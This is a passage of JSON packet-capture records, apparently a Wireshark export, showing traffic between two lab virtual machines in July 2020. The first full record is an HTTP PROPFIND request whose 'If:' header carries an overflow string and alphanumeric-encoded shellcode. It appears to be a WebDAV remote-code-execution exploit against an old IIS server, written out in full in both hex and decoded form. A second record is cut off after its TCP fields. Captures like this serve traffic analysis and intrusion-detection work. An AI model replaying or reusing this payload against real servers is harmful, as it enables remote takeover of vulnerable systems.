||
},
|
||
{
|
||
"_index": "packets-2020-07-17",
|
||
"_type": "doc",
|
||
"_score": null,
|
||
"_source": {
|
||
"layers": {
|
||
"frame": {
|
||
"frame.interface_id": "0",
|
||
"frame.interface_id_tree": {
|
||
"frame.interface_name": "\\Device\\NPF_{A3208914-5057-4474-9535-A579B0FE0EE5}"
|
||
},
|
||
"frame.encap_type": "1",
|
||
"frame.time": "Jul 17, 2020 03:19:53.892415000 SE Asia Standard Time",
|
||
"frame.offset_shift": "0.000000000",
|
||
"frame.time_epoch": "1594930793.892415000",
|
||
"frame.time_delta": "0.000006000",
|
||
"frame.time_delta_displayed": "0.003995000",
|
||
"frame.time_relative": "17.143355000",
|
||
"frame.number": "556",
|
||
"frame.len": "265",
|
||
"frame.cap_len": "265",
|
||
"frame.marked": "0",
|
||
"frame.ignored": "0",
|
||
"frame.protocols": "eth:ethertype:ip:tcp:http",
|
||
"frame.coloring_rule.name": "HTTP",
|
||
"frame.coloring_rule.string": "http || tcp.port == 80 || http2"
|
||
},
|
||
"eth": {
|
||
"eth.dst": "00:0c:29:50:92:ec",
|
||
"eth.dst_tree": {
|
||
"eth.dst_resolved": "VMware_50:92:ec",
|
||
"eth.dst.oui": "3113",
|
||
"eth.dst.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:50:92:ec",
|
||
"eth.addr_resolved": "VMware_50:92:ec",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.dst.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.dst.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.src": "00:0c:29:53:25:34",
|
||
"eth.src_tree": {
|
||
"eth.src_resolved": "VMware_53:25:34",
|
||
"eth.src.oui": "3113",
|
||
"eth.src.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:53:25:34",
|
||
"eth.addr_resolved": "VMware_53:25:34",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.src.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.src.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.type": "0x00000800"
|
||
},
|
||
"ip": {
|
||
"ip.version": "4",
|
||
"ip.hdr_len": "20",
|
||
"ip.dsfield": "0x00000000",
|
||
"ip.dsfield_tree": {
|
||
"ip.dsfield.dscp": "0",
|
||
"ip.dsfield.ecn": "0"
|
||
},
|
||
"ip.len": "251",
|
||
"ip.id": "0x00000d9f",
|
||
"ip.flags": "0x00004000",
|
||
"ip.flags_tree": {
|
||
"ip.flags.rb": "0",
|
||
"ip.flags.df": "1",
|
||
"ip.flags.mf": "0"
|
||
},
|
||
"ip.frag_offset": "0",
|
||
"ip.ttl": "64",
|
||
"ip.proto": "6",
|
||
"ip.checksum": "0x000022f7",
|
||
"ip.checksum.status": "2",
|
||
"ip.src": "192.168.68.21",
|
||
"ip.addr": "192.168.68.21",
|
||
"ip.src_host": "192.168.68.21",
|
||
"ip.host": "192.168.68.21",
|
||
"ip.dst": "192.168.68.1",
|
||
"ip.addr": "192.168.68.1",
|
||
"ip.dst_host": "192.168.68.1",
|
||
"ip.host": "192.168.68.1"
|
||
},
|
||
"tcp": {
|
||
"tcp.srcport": "40121",
|
||
"tcp.dstport": "80",
|
||
"tcp.port": "40121",
|
||
"tcp.port": "80",
|
||
"tcp.stream": "78",
|
||
"tcp.len": "199",
|
||
"tcp.seq": "1449",
|
||
"tcp.seq_raw": "1065040842",
|
||
"tcp.nxtseq": "1648",
|
||
"tcp.ack": "1",
|
||
"tcp.ack_raw": "2775862227",
|
||
"tcp.hdr_len": "32",
|
||
"tcp.flags": "0x00000018",
|
||
"tcp.flags_tree": {
|
||
"tcp.flags.res": "0",
|
||
"tcp.flags.ns": "0",
|
||
"tcp.flags.cwr": "0",
|
||
"tcp.flags.ecn": "0",
|
||
"tcp.flags.urg": "0",
|
||
"tcp.flags.ack": "1",
|
||
"tcp.flags.push": "1",
|
||
"tcp.flags.reset": "0",
|
||
"tcp.flags.syn": "0",
|
||
"tcp.flags.fin": "0",
|
||
"tcp.flags.str": "·······AP···"
|
||
},
|
||
"tcp.window_size_value": "502",
|
||
"tcp.window_size": "64256",
|
||
"tcp.window_size_scalefactor": "128",
|
||
"tcp.checksum": "0x0000ec59",
|
||
"tcp.checksum.status": "2",
|
||
"tcp.urgent_pointer": "0",
|
||
"tcp.options": "01:01:08:0a:89:ad:cc:9c:00:00:00:00",
|
||
"tcp.options_tree": {
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.timestamp": "08:0a:89:ad:cc:9c:00:00:00:00",
|
||
"tcp.options.timestamp_tree": {
|
||
"tcp.option_kind": "8",
|
||
"tcp.option_len": "10",
|
||
"tcp.options.timestamp.tsval": "2309868700",
|
||
"tcp.options.timestamp.tsecr": "0"
|
||
}
|
||
},
|
||
"tcp.analysis": {
|
||
"tcp.analysis.initial_rtt": "0.000266000",
|
||
"tcp.analysis.bytes_in_flight": "1647",
|
||
"tcp.analysis.push_bytes_sent": "1647"
|
||
},
|
||
"Timestamps": {
|
||
"tcp.time_relative": "0.000496000",
|
||
"tcp.time_delta": "0.000006000"
|
||
},
|
||
"tcp.payload": "72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a",
|
||
"tcp.segment_data": "72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"tcp.segments": {
|
||
"tcp.segment": "555",
|
||
"tcp.segment": "556",
|
||
"tcp.segment.count": "2",
|
||
"tcp.reassembled.length": "1647",
|
||
"tcp.reassembled.data": "50:52:4f:50:46:49:4e:44:20:2f:20:48:54:54:50:2f:31:2e:31:0d:0a:48:6f:73:74:3a:20:31:39:32:2e:31:36:38:2e:36:38:2e:31:0d:0a:55:73:65:72:2d:41:67:65:6e:74:3a:20:4d:6f:7a:69:6c:6c:61:2f:34:2e:30:20:28:63:6f:6d:70:61:74:69:62:6c:65:3b:20:4d:53:49:45:20:36:2e:30:3b:20:57:69:6e:64:6f:77:73:20:4e:54:20:35:2e:31:29:0d:0a:43:6f:6e:74:65:6e:74:2d:4c:65:6e:67:74:68:3a:20:30:0d:0a:49:66:3a:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:6d:41:68:41:41:72:62:73:54:62:4d:6c:41:68:47:6d:4f:41:45:4a:53:4d:4c:62:4d:6f:66:53:69:48:4e:70:6c:4e:69:57:52:47:6f:49:76:6c:6f:67:76:64:66:50:56:6b:58:6e:47:65:65:6c:44:59:57:43:56:69:63:54:76:48:57:6b:e5:89:aa:e6:b9:8d:e5:91:97:e5:a1:a7:e6:95:a8:e7:99:a6:e4:89:a7:e6:a1:89:e4:b9:a4:e5:91:87:e6:a5:a8:e6:a5:89:e7:81:ae:e5:89:8a:e7:85:a6:e7:a9:8f:c8:82:c8:82:e1:8b:80:e6:a0:83:e7:81:b9:e5:89:88:e4:a1:92:e7:81:b9:e7:85:a1:e6:b1:86:e4:91:ab:e4:b9:a9:e4:89:ad:e6:a9:b0:e4:9d:aa:e4:b5:88:e6:a9:8e:e7:9d:a7:e4:a1:82:e4:89:93:e5:81:98:e6:8d:91:e5:95:b0:e6:b9:86:e1:8f:80:e6:a0:83:3e:20:28:4e:6f:74:20:3c:6c:6f:63:6b:74:6f:6b:65:6e:3a:77:72:69:74:65:31:3e:29:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:51:64:58:7a:66:49:48:77:75:44:59:52:6d:70:7a:61:41:78:4d:50:5a:77:4f:46:43:54:43:71:6e:4a:6e:54:74:75:59:70:51:5a:6c:72:74:76:6c:75:61:58:41:4a:75:51:65:52:44:71:64:52:50:65:44:44:7a:70:6e:59:52:57:73:7a:e4:89:85:e6:b9:ac:e7:91:ad:e4:a5:8e:e6:85:93:e4:91:ba:e4:95:8c:e5:8d:84:e6:8d:8c:e4:bd:8f:e6:ad:ab:e4:b5:8d:e7:91:a8:e4:ad:87:e1:8f:80:e6:a0:83:ef:8e:8d:e7:9e:bd:e7:a9:8f:e4:91:b7:e7:99:83:e4:b5:b9:e1:8f:80:e6:a0:83:e7:99:a3:e6:91:a8:e6:ad:8d:e6:a1:94:e6:91:9a:e5:8d:ba:e4:b1:ad:e6:b5:98:e6:82:82:e6:a0:81:eb:81:ac:e7:9e:bc:ef:80:81:e7:9e:be:e2:95:a3:e7:9e:bb:e1:84:94:e7:9e:ba:ef:89:84:e7:9e:bb:e4:85:81:e4:85:81:ee:b8:a2:e7:9e:bb:e9:a0:81:e7:9e:bc:e2:89:a5:e7:9e:be:e2:95:a3:e7:9e:bb:e9:91:af:cf:80:ed:91:81:e7:9e:bd:e4:a3:93:e7:9e:bb:e2:87:a0:e7:9e:bf:ef:84:82:e7:9e:bb:ef:b0:82:e7:9e:bb:ef:80:81:e7:9e:be:e8:b0:84:e7:9e:bd:e8:b0:85:e7:9e:bd:e2:95:a3:e7:9e:bb:e9:91:8f:cf:80:ed:91:81:e7:9e:bd:e8:8a:85:e7:9e:bb:e2:95:a3:e7:9e:bb:e9:82:90:e9:82:90:e6:96:91:e7:9e:be:e5:b9:94:ec:9a:83:e4:84:8a:56:56:59:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:6a:58:41:51:41:44:41:5a:41:42:41:52:41:4c:41:59:41:49:41:51:41:49:41:51:41:49:41:68:41:41:41:5a:31:41:49:41:49:41:4a:31:31:41:49:41:49:41:42:41:42:41:42:51:49:31:41:49:51:49:41:49:51:49:31:31:31:41:49:41:4a:51:59:41:5a:42:41:42:41:42:41:42:41:42:6b:4d:41:47:42:39:75:34:4a:42:59:6c:48:68:61:72:6d:30:69:70:49:70:53:30:75:39:69:55:4d:61:59:30:71:54:74:4b:42:30:4e:50:52:6b:71:42:4c:4c:42:6b:50:52:4d:44:62:6b:73:42:6c:68:6c:4f:77:47:4d:7a:6d:56:4e:51:6b:4f:54:6c:6d:6c:51:51:71:6c:6c:42:4c:6c:4d:50:47:51:56:6f:5a:6d:6a:61:46:67:58:62:49:62:72:32:4e:77:52:6b:31:42:7a:70:44:4b:6d:7a:4f:4c:74:4b:50:4c:6a:71:71:68:4a:43:61:38:7a:61:38:51:50:51:74:4b:61:49:6d:50:49:71:67:63:74:4b:4d:79:5a:78:6b:33:4d:6a:6e:69:52:6b:4d:64:64:4b:4d:31:36:76:6e:51:59:6f:56:4c:66:61:58:4f:6a:6d:39:71:75:77:50:38:57:70:30:75:6c:36:4c:43:71:6d:39:68:4f:4b:61:6d:4e:44:43:45:47:74:6e:78:42:6b:4f:68:4d:54:4b:51:56:73:32:46:74:4b:4c:4c:50:4b:64:4b:4e:78:4b:6c:59:71:5a:33:74:4b:4c:44:44:4b:59:71:58:50:64:49:71:34:6e:44:6e:44:6f:6b:71:4b:53:31:70:59:31:4a:62:31:79:6f:4b:30:4f:6f:31:4f:51:4a:62:6b:5a:72:48:6b:72:6d:61:4d:62:48:4c:73:4c:72:59:70:6b:50:42:48:52:57:72:53:6c:72:61:4f:31:44:53:38:6e:6c:62:57:6d:56:6b:57:39:6f:48:55:74:78:56:30:4d:31:49:70:79:70:4b:79:69:34:4e:74:62:30:62:48:4e:49:75:30:30:6b:79:70:69:6f:49:45:4e:70:4e:70:50:50:32:30:31:30:32:30:61:30:6e:70:53:38:78:6a:4c:4f:47:6f:67:70:49:6f:77:65:46:37:50:6a:6b:55:53:38:55:70:77:38:31:34:6e:35:50:68:4c:42:69:70:6a:71:71:4c:72:69:58:66:71:5a:6c:50:72:36:62:37:70:68:33:69:74:65:61:64:71:51:4b:4f:77:65:43:55:45:70:64:34:4a:6c:59:6f:70:4e:39:78:62:55:48:6c:30:68:7a:50:57:45:56:42:52:36:79:6f:66:75:30:6a:39:70:51:5a:6b:54:71:46:52:37:6f:78:4b:52:79:49:66:68:6f:6f:39:6f:48:55:44:4b:70:36:33:51:5a:56:70:4b:71:48:30:4f:6e:72:62:6d:6c:4e:32:4a:6d:70:6f:78:4d:30:4e:30:79:70:4b:50:30:51:52:4a:69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"http": {
|
||
"PROPFIND / HTTP/1.1\\r\\n": {
|
||
"_ws.expert": {
|
||
"http.chat": "",
|
||
"_ws.expert.message": "PROPFIND / HTTP/1.1\\r\\n",
|
||
"_ws.expert.severity": "2097152",
|
||
"_ws.expert.group": "33554432"
|
||
},
|
||
"http.request.method": "PROPFIND",
|
||
"http.request.uri": "/",
|
||
"http.request.version": "HTTP/1.1"
|
||
},
|
||
"http.host": "192.168.68.1",
|
||
"http.request.line": "Host: 192.168.68.1\r\n",
|
||
"http.user_agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
|
||
"http.request.line": "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n",
|
||
"http.content_length_header": "0",
|
||
"http.content_length_header_tree": {
|
||
"http.content_length": "0"
|
||
},
|
||
"http.request.line": "Content-Length: 0\r\n",
|
||
"http.request.line": "If: <http://192.168.68.1:80/mAhAArbsTbMlAhGmOAEJSMLbMofSiHNplNiWRGoIvlogvdfPVkXnGeelDYWCVicTvHWk<57><6B><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> (Not <locktoken:write1>) <http://192.168.68.1:80/QdXzfIHwuDYRmpzaAxMPZwOFCTCqnJnTtuYpQZlrtvluaXAJuQeRDqdRPeDDzpnYRWsz<73><7A><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBYlHharm0ipIpS0u9iUMaY0qTtKB0NPRkqBLLBkPRMDbksBlhlOwGMzmVNQkOTlmlQQqllBLlMPGQVoZmjaFgXbIbr2NwRk1BzpDKmzOLtKPLjqqhJCa8za8QPQtKaImPIqgctKMyZxk3MjniRkMddKM16vnQYoVLfaXOjm9quwP8Wp0ul6LCqm9hOKamNDCEGtnxBkOhMTKQVs2FtKLLPKdKNxKlYqZ3tKLDDKYqXPdIq4nDnDokqKS1pY1Jb1yoK0Oo1OQJbkZrHkrmaMbHLsLrYpkPBHRWrSlraO1DS8nlbWmVkW9oHUtxV0M1IpypKyi4Ntb0bHNIu00kypioIENpNpPP201020a0npS8xjLOGogpIoweF7PjkUS8Upw814n5PhLBipjqqLriXfqZlPr6b7ph3iteadqQKOweCUEpd4JlYopN9xbUHl0hzPWEVBR6yofu0j9pQZkTqFR7oxKRyIfhoo9oHUDKp63QZVpKqH0OnrbmlN2JmpoxM0N0ypKP0QRJipphpX6D0Sk5ioGeBmDX9pkQ9pM0r3R6pPBJKP0Vb3B738KRxYFh1OIoHU9qUsNIUv1ehnQKqIomr5Og4IYOgxLPkPM0yp0kS9RLplaUT22V2UBLD4RUqbs5LqMbOC1Np1gPdjkNUpBU9k1q8oypm19pM0NQyK9rmL9wsYersPK2LOjbklmF4JztkWDFjtmObhMDIwyn90SE7xMa7kKN7PYrmLywcZN4IwSVZtMOqxlTLGIrn4ko1zKdn7P0B5IppEmyBUjEaOUsAA>\r\n",
|
||
"\\r\\n": "",
|
||
"http.request.full_uri": "http://192.168.68.1/",
|
||
"http.request": "1",
|
||
"http.request_number": "1",
|
||
"http.response_in": "558"
|
||
}
|
||
}
|
||
}
|
||
},
|
||
{
|
||
"_index": "packets-2020-07-17",
|
||
"_type": "doc",
|
||
"_score": null,
|
||
"_source": {
|
||
"layers": {
|
||
"frame": {
|
||
"frame.interface_id": "0",
|
||
"frame.interface_id_tree": {
|
||
"frame.interface_name": "\\Device\\NPF_{A3208914-5057-4474-9535-A579B0FE0EE5}"
|
||
},
|
||
"frame.encap_type": "1",
|
||
"frame.time": "Jul 17, 2020 03:19:53.896072000 SE Asia Standard Time",
|
||
"frame.offset_shift": "0.000000000",
|
||
"frame.time_epoch": "1594930793.896072000",
|
||
"frame.time_delta": "0.000053000",
|
||
"frame.time_delta_displayed": "0.003657000",
|
||
"frame.time_relative": "17.147012000",
|
||
"frame.number": "566",
|
||
"frame.len": "263",
|
||
"frame.cap_len": "263",
|
||
"frame.marked": "0",
|
||
"frame.ignored": "0",
|
||
"frame.protocols": "eth:ethertype:ip:tcp:http",
|
||
"frame.coloring_rule.name": "HTTP",
|
||
"frame.coloring_rule.string": "http || tcp.port == 80 || http2"
|
||
},
|
||
"eth": {
|
||
"eth.dst": "00:0c:29:50:92:ec",
|
||
"eth.dst_tree": {
|
||
"eth.dst_resolved": "VMware_50:92:ec",
|
||
"eth.dst.oui": "3113",
|
||
"eth.dst.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:50:92:ec",
|
||
"eth.addr_resolved": "VMware_50:92:ec",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.dst.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.dst.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.src": "00:0c:29:53:25:34",
|
||
"eth.src_tree": {
|
||
"eth.src_resolved": "VMware_53:25:34",
|
||
"eth.src.oui": "3113",
|
||
"eth.src.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:53:25:34",
|
||
"eth.addr_resolved": "VMware_53:25:34",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.src.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.src.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.type": "0x00000800"
|
||
},
|
||
"ip": {
|
||
"ip.version": "4",
|
||
"ip.hdr_len": "20",
|
||
"ip.dsfield": "0x00000000",
|
||
"ip.dsfield_tree": {
|
||
"ip.dsfield.dscp": "0",
|
||
"ip.dsfield.ecn": "0"
|
||
},
|
||
"ip.len": "249",
|
||
"ip.id": "0x00007374",
|
||
"ip.flags": "0x00004000",
|
||
"ip.flags_tree": {
|
||
"ip.flags.rb": "0",
|
||
"ip.flags.df": "1",
|
||
"ip.flags.mf": "0"
|
||
},
|
||
"ip.frag_offset": "0",
|
||
"ip.ttl": "64",
|
||
"ip.proto": "6",
|
||
"ip.checksum": "0x0000bd23",
|
||
"ip.checksum.status": "2",
|
||
"ip.src": "192.168.68.21",
|
||
"ip.addr": "192.168.68.21",
|
||
"ip.src_host": "192.168.68.21",
|
||
"ip.host": "192.168.68.21",
|
||
"ip.dst": "192.168.68.1",
|
||
"ip.addr": "192.168.68.1",
|
||
"ip.dst_host": "192.168.68.1",
|
||
"ip.host": "192.168.68.1"
|
||
},
|
||
"tcp": {
|
||
"tcp.srcport": "38157",
|
||
"tcp.dstport": "80",
|
||
"tcp.port": "38157",
|
||
"tcp.port": "80",
|
||
"tcp.stream": "79",
|
||
"tcp.len": "197",
|
||
"tcp.seq": "1449",
|
||
"tcp.seq_raw": "4020826740",
|
||
"tcp.nxtseq": "1646",
|
||
"tcp.ack": "1",
|
||
"tcp.ack_raw": "3115507281",
|
||
"tcp.hdr_len": "32",
|
||
"tcp.flags": "0x00000018",
|
||
"tcp.flags_tree": {
|
||
"tcp.flags.res": "0",
|
||
"tcp.flags.ns": "0",
|
||
"tcp.flags.cwr": "0",
|
||
"tcp.flags.ecn": "0",
|
||
"tcp.flags.urg": "0",
|
||
"tcp.flags.ack": "1",
|
||
"tcp.flags.push": "1",
|
||
"tcp.flags.reset": "0",
|
||
"tcp.flags.syn": "0",
|
||
"tcp.flags.fin": "0",
|
||
"tcp.flags.str": "·······AP···"
|
||
},
|
||
"tcp.window_size_value": "502",
|
||
"tcp.window_size": "64256",
|
||
"tcp.window_size_scalefactor": "128",
|
||
"tcp.checksum": "0x000058a5",
|
||
"tcp.checksum.status": "2",
|
||
"tcp.urgent_pointer": "0",
|
||
"tcp.options": "01:01:08:0a:89:ad:cc:9f:00:00:00:00",
|
||
"tcp.options_tree": {
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.timestamp": "08:0a:89:ad:cc:9f:00:00:00:00",
|
||
"tcp.options.timestamp_tree": {
|
||
"tcp.option_kind": "8",
|
||
"tcp.option_len": "10",
|
||
"tcp.options.timestamp.tsval": "2309868703",
|
||
"tcp.options.timestamp.tsecr": "0"
|
||
}
|
||
},
|
||
"tcp.analysis": {
|
||
"tcp.analysis.initial_rtt": "0.000213000",
|
||
"tcp.analysis.bytes_in_flight": "1645",
|
||
"tcp.analysis.push_bytes_sent": "1645"
|
||
},
|
||
"Timestamps": {
|
||
"tcp.time_relative": "0.000534000",
|
||
"tcp.time_delta": "0.000053000"
|
||
},
|
||
